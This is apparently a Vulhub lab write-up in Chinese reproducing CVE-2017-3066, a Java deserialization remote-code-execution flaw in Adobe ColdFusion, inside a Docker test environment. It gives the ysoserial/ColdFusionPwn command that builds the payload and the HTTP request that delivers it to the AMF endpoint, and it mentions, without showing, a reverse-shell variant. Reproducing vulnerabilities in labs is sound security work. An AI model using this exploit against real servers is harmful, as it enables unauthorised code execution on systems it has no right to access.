Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)
Adobe ColdFusion是美國Adobe公司的一款動態Web服務器產品,其運行的CFML(ColdFusion Markup Language)是針對Web應用的一種程序設計語言。
Adobe ColdFusion中存在java反序列化漏洞。攻擊者可利用該漏洞在受影響應用程序的上下文中執行任意代碼或造成拒絕服務。以下版本受到影響:Adobe ColdFusion (2016 release) Update 3及之前的版本,ColdFusion 11 Update 11及之前的版本,ColdFusion 10 Update 22及之前的版本。
參考鏈接:
漏洞環境
啟動漏洞環境:
docker-compose up -d
等待數分鐘時間,環境啟動成功,訪問http://your-ip:8500/CFIDE/administrator/index.cfm,輸入密碼vulhub,即可成功安裝Adobe ColdFusion。
漏洞復現
我們使用參考鏈接中的ColdFusionPwn工具來生成POC:
java -cp ColdFusionPwn-0.0.1-SNAPSHOT-all.jar:ysoserial-0.0.6-SNAPSHOT-all.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/success' poc.ser
POC生成于poc.ser文件中,將POC作為數據包body發送給http://your-ip:8500/flex2gateway/amf,Content-Type為application/x-amf:
POST /flex2gateway/amf HTTP/1.1
Host: your-ip:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 2853
[...poc...]

進入容器中,發現/tmp/success已成功創建:

將POC改成反彈命令,成功拿到shell:

Vulhub 文檔
推薦文章: